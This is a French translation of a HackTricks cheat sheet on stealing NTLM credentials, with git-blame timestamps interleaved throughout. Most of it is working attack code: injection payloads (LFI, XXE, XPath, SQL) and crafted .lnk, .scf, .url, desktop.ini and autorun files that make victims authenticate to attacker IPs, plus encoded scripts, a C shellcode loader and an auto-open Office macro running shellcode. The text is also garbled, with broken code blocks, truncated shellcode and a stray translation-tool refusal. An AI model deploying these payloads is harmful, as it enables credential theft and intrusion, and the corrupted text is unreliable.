2024-01-09 14:32:10 +00:00
# Endroits pour voler les identifiants NTLM
2022-04-28 16:01:33 +00:00
< details >
2024-01-09 14:32:10 +00:00
< summary > < strong > Apprenez le piratage AWS de zéro à héros avec< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:32:10 +00:00
Autres moyens de soutenir HackTricks :
2022-04-28 16:01:33 +00:00
2024-01-09 14:32:10 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** , consultez les [**PLANS D'ABONNEMENT** ](https://github.com/sponsors/carlospolop )!
* Obtenez le [**merchandising officiel PEASS & HackTricks** ](https://peass.creator-spring.com )
* Découvrez [**La Famille PEASS** ](https://opensea.io/collection/the-peass-family ), notre collection d'[**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusifs
* **Rejoignez le** 💬 [**groupe Discord** ](https://discord.gg/hRep4RUj7f ) ou le [**groupe telegram** ](https://t.me/peass ) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) et [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-01-09 14:32:10 +00:00
## Création automatique de Payloads & Autres listes
2022-04-28 16:01:33 +00:00
2022-07-11 08:44:04 +00:00
### [ntlm\_theft](https://github.com/Greenwolf/ntlm\_theft)
2020-12-23 00:17:28 +00:00
2024-01-09 14:32:10 +00:00
Cet outil va **créer plusieurs documents/fichiers** qui, s'ils sont accédés par l'utilisateur, vont **déclencher une authentification NTLM avec l'attaquant** .
2020-12-23 00:17:28 +00:00
2023-06-03 13:10:46 +00:00
#### ntlm\_theft prend en charge les types d'attaques suivants :
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
Naviguer vers un dossier contenant :
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
* .url – via le champ URL
* .url – via le champ ICONFILE
2023-06-03 13:10:46 +00:00
* .lnk - via le champ icon\_location
2024-01-09 14:32:10 +00:00
* .scf – via le champ ICONFILE (Ne fonctionne pas sur les dernières versions de Windows)
* autorun.inf via le champ OPEN (Ne fonctionne pas sur les dernières versions de Windows)
* desktop.ini - via le champ IconResource (Ne fonctionne pas sur les dernières versions de Windows)
2021-01-06 11:08:49 +00:00
2024-01-09 14:32:10 +00:00
Ouvrir un document :
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
* .xml – via la feuille de style externe de Microsoft Word
* .xml – via le champ includepicture de Microsoft Word
* .htm – via Chrome & IE & Edge img src (uniquement si ouvert localement, non hébergé)
* .docx – via le champ includepicture de Microsoft Word
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.docx – via le modèle externe de Microsoft Word
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.docx – via les paramètres webSettings de frameset de Microsoft Word
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.xlsx - via la cellule externe de Microsoft Excel
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.wax - via la playlist de Windows Media Player (Mieux, ouverture principale)
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.asx – via la playlist de Windows Media Player (Mieux, ouverture principale)
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.m3u – via la playlist de Windows Media Player (Moins bien, Win10 ouvre d'abord dans Groovy)
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.jnlp – via le jar externe de Java
2021-01-07 12:13:26 +00:00
2024-01-09 14:32:10 +00:00
\-.application – via n'importe quel navigateur (Doit être servi via un navigateur téléchargé sinon ne fonctionnera pas)
2021-01-06 11:08:49 +00:00
2024-01-09 14:32:10 +00:00
Ouvrir un document et accepter la popup :
2021-01-06 11:08:49 +00:00
2024-01-09 14:32:10 +00:00
* .pdf – via Adobe Acrobat Reader
2021-01-06 11:08:49 +00:00
2024-01-09 14:32:10 +00:00
Cliquer sur un lien dans un programme de chat :
2021-01-06 11:08:49 +00:00
2024-01-09 14:32:10 +00:00
* .txt – lien formaté à coller dans le chat Zoom
2021-01-06 11:08:49 +00:00
2023-06-03 13:10:46 +00:00
> Exemple :
2021-01-07 12:13:26 +00:00
>
> ```bash
> # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
2024-01-09 14:32:10 +00:00
> Créé : test/test.scf (NAVIGUER)
> Créé : test/test-(url).url (NAVIGUER)
> Créé : test/test-(icon).url (NAVIGUER)
> Créé : test/test.rtf (OUVRIR)
> Créé : test/test-(stylesheet).xml (OUVRIR)
> Créé : test/test-(fulldocx).xml (OUVRIR)
> Créé : test/test.htm (OUVRIR DEPUIS LE BUREAU AVEC CHROME, IE OU EDGE)
> Créé : test/test-(includepicture).docx (OUVRIR)
> Créé : test/test-(remotetemplate).docx (OUVRIR)
> Créé : test/test-(frameset).docx (OUVRIR)
> Créé : test/test.m3u (OUVRIR DANS WINDOWS MEDIA PLAYER UNIQUEMENT)
> Créé : test/test.asx (OUVRIR)
> Créé : test/test.jnlp (OUVRIR)
> Créé : test/test.application (TÉLÉCHARGER ET OUVRIR)
> Créé : test/test.pdf (OUVRIR ET AUTORISER)
> Créé : test/zoom-attack-instructions.txt (COLLER AU CHAT)
> Génération complète.
2021-01-07 12:13:26 +00:00
> ```
2021-01-06 11:08:49 +00:00
2022-07-11 08:44:04 +00:00
### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All\_NTLM\_leak)
2020-12-23 00:17:28 +00:00
2024-01-09 14:32:10 +00:00
> Cheatsheet
2021-01-06 11:14:58 +00:00
2024-01-09 14:32:10 +00:00
Ceci est une liste de techniques pour forcer les authentifications NTLM afin de voler les identifiants de la victime.
2020-12-23 00:17:28 +00:00
2024-01-09 14:32:10 +00:00
### Forcer l'authentification privilégiée NTLM
2020-12-23 00:17:28 +00:00
2024-01-09 14:32:10 +00:00
Vous pourriez être capable de **forcer une machine Windows à s'authentifier sur une machine arbitraire** en utilisant un compte privilégié. Lisez la page suivante pour en savoir plus :
2020-12-23 00:17:28 +00:00
2022-07-11 08:44:04 +00:00
{% content-ref url="../active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md ](../active-directory-methodology/printers-spooler-service-abuse.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## LFI
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
La fonction include() en PHP résoudra le chemin réseau pour nous.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/?page=//11.22.33.44/@OsandaMalith
```
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 642 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## XXE
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
Ici, j'utilise "php://filter/convert.base64-encode/resource=" qui résoudra un chemin réseau.
2020-07-15 15:43:14 +00:00
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/ @OsandaMalith " >
]>
< root >
2024-01-09 14:32:10 +00:00
< name > < / name >
< tel > < / tel >
< email > OUT&xxe; OUT< / email >
< password > < / password >
2020-07-15 15:43:14 +00:00
< / root >
```
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 618 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Injection XPath
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Habituellement, doc() est utilisé dans les injections XPath hors bande, donc peut être appliqué dans la résolution d'un chemin réseau.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/?title=Foundation& type=*& rent_days=* and doc('//35.164.153.224/@OsandaMalith ')
```
2022-07-21 23:50:52 +00:00
![](< .. / . . / . gitbook / assets / image ( 638 ) ( 2 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Injection MySQL
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
J'ai rédigé un [article complet ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/ ) sur les injections MySQL hors bande qui peuvent être appliquées sur Internet. Vous pouvez également utiliser 'INTO OUTFILE' pour résoudre un chemin réseau.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘ \\\\192.168.0.100\\@OsandaMalith ’ ),4;%00
```
2024-01-09 14:32:10 +00:00
![](< .. / . . / . gitbook / assets / image ( 663 ) . png > )
2022-07-11 08:44:04 +00:00
## MSSQL
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Puisque les requêtes empilées sont prises en charge, nous pouvons appeler des procédures stockées.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
';declare @q varchar(99);set @q ='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
```
2022-07-11 08:44:04 +00:00
## Regsvr32
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
J'ai trouvé celui-ci par accident en expérimentant avec des fichiers .sct.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
```
2022-07-11 08:44:04 +00:00
## Batch
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
Il existe de nombreuses façons possibles que vous pouvez explorer
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
cmd /c \\192.168.0.1\abc
start \\192.168.0.1\abc
mkdir \\192.168.0.1\abc
type\\192.168.0.1\abc
dir\\192.168.0.1\abc
find, findstr, [x]copy, move, replace, del, rename and many more!
```
2024-01-09 14:32:10 +00:00
## Auto-Completion
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Il suffit de taper ‘ \host\’ et l'auto-complétion fera l'affaire sous l'explorateur et la boîte de dialogue exécuter.
2020-12-11 22:27:11 +00:00
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 660 ) . png > )
2020-12-11 22:27:11 +00:00
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 637 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## Autorun.inf
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
À partir de Windows 7, cette fonctionnalité est désactivée. Cependant, vous pouvez l'activer en modifiant la stratégie de groupe pour Autorun. Assurez-vous de masquer le fichier Autorun.inf pour qu'il fonctionne.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
```
2023-06-03 13:10:46 +00:00
## Fichiers de commandes Shell
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Il est possible d'obtenir les hachages de mots de passe des utilisateurs de domaine ou des shells lorsque des permissions d'écriture sont accordées aux utilisateurs non authentifiés. Les SCF (Shell Command Files) peuvent effectuer un ensemble limité d'opérations telles qu'afficher le bureau Windows ou ouvrir un explorateur Windows. Enregistrez le code ci-dessous sous le nom `ordinary.scf` et placez-le dans un partage réseau.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[Shell]
Command=2
2021-10-07 21:09:05 +13:00
IconFile=\\AttackerIP\ordinary.ico
2020-07-15 15:43:14 +00:00
[Taskbar]
Command=ToggleDesktop
```
2022-07-11 08:44:04 +00:00
## Desktop.ini
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Les fichiers desktop.ini contiennent les informations des icônes que vous avez appliquées au dossier. Nous pouvons en abuser pour résoudre un chemin réseau. Une fois que vous ouvrez le dossier, vous devriez obtenir les hachages.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
```
2024-01-09 14:32:10 +00:00
Dans les systèmes Windows XP, le fichier desktop.ini utilise `IcondFile` au lieu de `IconResource` .
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
```
2024-01-09 14:32:10 +00:00
## Fichiers de raccourci (.lnk)
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Nous pouvons créer un raccourci contenant notre chemin réseau et dès que vous ouvrez le raccourci, Windows essaiera de résoudre le chemin réseau. Vous pouvez également spécifier un raccourci clavier pour déclencher le raccourci. Pour l'icône, vous pouvez donner le nom d'un binaire Windows ou choisir une icône parmi shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll ou wmploc.dll situés dans le répertoire system32.
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
```
2024-01-09 14:32:10 +00:00
La version Powershell.
2022-08-15 13:00:19 +00:00
```powershell
2022-09-03 09:30:58 +00:00
#TargetPath attack
2020-07-15 15:43:14 +00:00
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
2022-09-03 09:30:58 +00:00
#IconLocation Attack
$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("\\dc\software\test.lnk")
$shortcut.IconLocation = "\\10.10.10.10\test.ico"
$shortcut.Save()
2020-07-15 15:43:14 +00:00
```
2023-06-03 13:10:46 +00:00
## Raccourcis Internet (.url)
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Un autre type de raccourci dans Windows est les raccourcis Internet. Vous pouvez enregistrer cela sous la forme quelquechose.url
2022-08-15 13:00:19 +00:00
```bash
2024-01-09 14:32:10 +00:00
echo [InternetShortcut] > stealMyHashes.url
2020-07-15 15:43:14 +00:00
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
2023-06-03 13:10:46 +00:00
## Autorun avec le Registre
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
Vous pouvez ajouter une nouvelle clé de registre dans l'un des chemins suivants.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
2024-01-09 14:32:10 +00:00
```markdown
![](< .. / . . / . gitbook / assets / image ( 307 ) ( 5 ) . png > )
2022-07-11 08:44:04 +00:00
## Powershell
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
Il existe probablement de nombreux scriptlets dans Powershell qui résoudraient un chemin réseau.
2022-07-11 08:44:04 +00:00
```
2024-01-09 14:32:10 +00:00
```
2020-07-15 15:43:14 +00:00
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
```
2022-07-11 08:44:04 +00:00
## IE
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
IE résoudra les chemins UNC. Par exemple
2022-08-15 13:00:19 +00:00
```html
2021-01-06 00:08:54 +00:00
< img src = " \\\\192.168.0.1 \\aa" >
2020-07-15 15:43:14 +00:00
```
2023-06-03 13:10:46 +00:00
Vous pouvez injecter sous XSS ou dans des scénarios où vous trouvez une injection SQL. Par exemple.
2022-07-11 08:44:04 +00:00
```
2021-01-06 00:08:54 +00:00
http://host.tld/?id=-1' union select 1,'< img src = " \\\\192.168.0.1 \\aa" > ';%00
2020-07-15 15:43:14 +00:00
```
2022-07-11 08:44:04 +00:00
## VBScript
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Vous pouvez enregistrer ceci en tant que .vbs ou l'utiliser dans une macro qui est appliquée à des fichiers Word ou Excel.
2020-12-23 00:17:28 +00:00
```bash
2020-07-15 15:43:14 +00:00
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
```
2024-01-09 14:32:10 +00:00
Vous pouvez l'appliquer dans des pages web mais cela fonctionne uniquement avec IE.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Vbscript" >
<!--
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
//-->
< / script >
< / html >
```
2024-01-09 14:32:10 +00:00
Voici la version codée. Vous pouvez coder et enregistrer cela en tant que something.vbe
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
#@~^ZQAAAA==j Y~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV ?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbV cJJzf*cF *cF*2 yczmCE~8#XSAAAA==^#~@
```
2024-01-09 14:32:10 +00:00
Vous pouvez également appliquer ceci dans des fichiers html. Mais cela fonctionne uniquement avec IE. Vous pouvez enregistrer ceci sous le nom de quelquechose.hta, ce qui sera une Application HTML sous Windows, que mshta.exe exécutera. Par défaut, il utilise IE.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Vbscript.Encode" >
<!--
#@~^ZQAAAA==j Y~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV ?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbV cJJzf*cF *cF*2 yczmCE~8#XSAAAA==^#~@
//-->
< / script >
< / html >
```
2022-07-11 08:44:04 +00:00
## JScript
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Vous pouvez enregistrer ceci en tant que something.js sous windows.
2020-12-23 00:17:28 +00:00
```javascript
2020-07-15 15:43:14 +00:00
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
```
2024-01-09 14:32:10 +00:00
Vous pouvez appliquer la même chose dans les fichiers html mais cela fonctionne uniquement avec IE. Vous pouvez également enregistrer ceci sous le nom de fichier something.hta.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Jscript" >
<!--
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
//-->
< / script >
< / html >
```
2024-01-09 14:32:10 +00:00
Voici la version codée. Vous pouvez l'enregistrer sous le nom de fichier something.jse.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
#@~^XAAAAA==-mD~6/K'x h,)mDk-+or8% mYvE?1DkaOrxTRwks+jzkYn:}8L mOE*i0dGcsrV 3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
```
2024-01-09 14:32:10 +00:00
Since you haven't provided the actual content from the book, I'm unable to translate it for you. If you provide the specific English text that you want to be translated into French, I can certainly help with that. Please paste the text here, and I'll take care of the translation while maintaining the markdown and HTML syntax as requested.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Jscript.Encode" >
<!--
#@~^XAAAAA==-mD~6/K'x h,)mDk-+or8% mYvE?1DkaOrxTRwks+jzkYn:}8L mOE*i0dGcsrV 3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
//-->
< / script >
< / html >
```
2023-06-03 13:10:46 +00:00
## Fichiers de script Windows
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Enregistrez ceci sous le nom de quelquechose.wsf.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< package >
2024-01-09 14:32:10 +00:00
< job id = "boom" >
< script language = "VBScript" >
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
< / script >
< / job >
2020-07-15 15:43:14 +00:00
< / package >
```
2022-07-11 08:44:04 +00:00
## Shellcode
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Voici un petit shellcode que j'ai créé. Ce shellcode utilise CreateFile et tente de lire un chemin réseau non existant. Vous pouvez utiliser des outils tels que Responder pour capturer les hachages NetNTLM. Le shellcode peut être modifié pour voler des hachages sur internet. Des attaques SMBRelay peuvent également être effectuées.
2022-07-11 08:44:04 +00:00
```cpp
2020-07-15 15:43:14 +00:00
/*
2024-01-09 14:32:10 +00:00
Title: CreateFile Shellcode
Author: Osanda Malith Jayathissa (@OsandaMalith )
Website: https://osandamalith.com
Size: 368 Bytes
2020-07-15 15:43:14 +00:00
*/
# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
int main() {
2021-01-06 00:08:54 +00:00
2024-01-09 14:32:10 +00:00
char *shellcode =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
"\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
"\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
"\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
"\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
"\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
"\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
"\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
"\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
"\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
"\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
"\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
"\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
DWORD oldProtect;
wprintf(L"Length : %d bytes\n@OsandaMalith ", strlen(shellcode));
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
if (!ret) {
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
2020-07-15 15:43:14 +00:00
}
2024-01-09 14:32:10 +00:00
((void(*)(void))shellcode)();
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
return EXIT_SUCCESS;
}
```
2023-06-03 13:10:46 +00:00
## Shellcode dans les Macros
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
Voici le shellcode ci-dessus appliqué dans une macro Word/Excel. Vous pouvez utiliser le même code dans une application VB6.
2022-07-11 08:44:04 +00:00
```basic
2020-07-15 15:43:14 +00:00
' Author : Osanda Malith Jayathissa (@OsandaMalith )
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' This is a word/excel macro. This can be used in vb6 applications as well
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
#If Vba7 Then
2024-01-09 14:32:10 +00:00
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As LongPtr
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
#Else
2024-01-09 14:32:10 +00:00
Private Declare Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Long, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As Long, _
ByRef Source As Any, _
ByVal Length As Long) As Long
2020-07-15 15:43:14 +00:00
#EndIf
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Const MEM_COMMIT = & H1000
Const PAGE_EXECUTE_READWRITE = & H40
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Sub Auto_Open()
2024-01-09 14:32:10 +00:00
Dim source As Long, i As Long
2020-07-15 15:43:14 +00:00
#If Vba7 Then
2024-01-09 14:32:10 +00:00
Dim lpMemory As LongPtr, lResult As LongPtr
2020-07-15 15:43:14 +00:00
#Else
2024-01-09 14:32:10 +00:00
Dim lpMemory As Long, lResult As Long
2020-07-15 15:43:14 +00:00
#EndIf
2021-01-06 00:08:54 +00:00
2024-01-09 14:32:10 +00:00
Dim bShellcode(376) As Byte
bShellcode(0) = 232
bShellcode(1) = 255
bShellcode(2) = 255
bShellcode(3) = 255
bShellcode(4) = 255
bShellcode(5) = 192
bShellcode(6) = 95
bShellcode(7) = 185
bShellcode(8) = 85
bShellcode(9) = 3
bShellcode(10) = 2
bShellcode(11) = 2
bShellcode(12) = 129
bShellcode(13) = 241
bShellcode(14) = 2
bShellcode(15) = 2
bShellcode(16) = 2
.....................
2020-07-15 15:43:14 +00:00
lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
2024-01-09 14:32:10 +00:00
For i = LBound(bShellcode) To UBound(bShellcode)
source = bShellcode(i)
lResult = RtlMoveMemory(lpMemory + i, source, 1)
Next i
lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
2020-07-15 15:43:14 +00:00
End Sub
Sub AutoOpen()
2024-01-09 14:32:10 +00:00
Auto_Open
2020-07-15 15:43:14 +00:00
End Sub
Sub Workbook_Open()
2024-01-09 14:32:10 +00:00
Auto_Open
2020-07-15 15:43:14 +00:00
End Sub
```
2023-06-03 13:10:46 +00:00
## Shellcode à l'intérieur de VBS et JS
2020-07-15 15:43:14 +00:00
2024-01-09 14:32:10 +00:00
subTee a réalisé de nombreuses recherches avec JS et DynamicWrapperX. Vous pouvez trouver un POC utilisant la DLL DynamicWrapperX.\
2022-07-11 08:44:04 +00:00
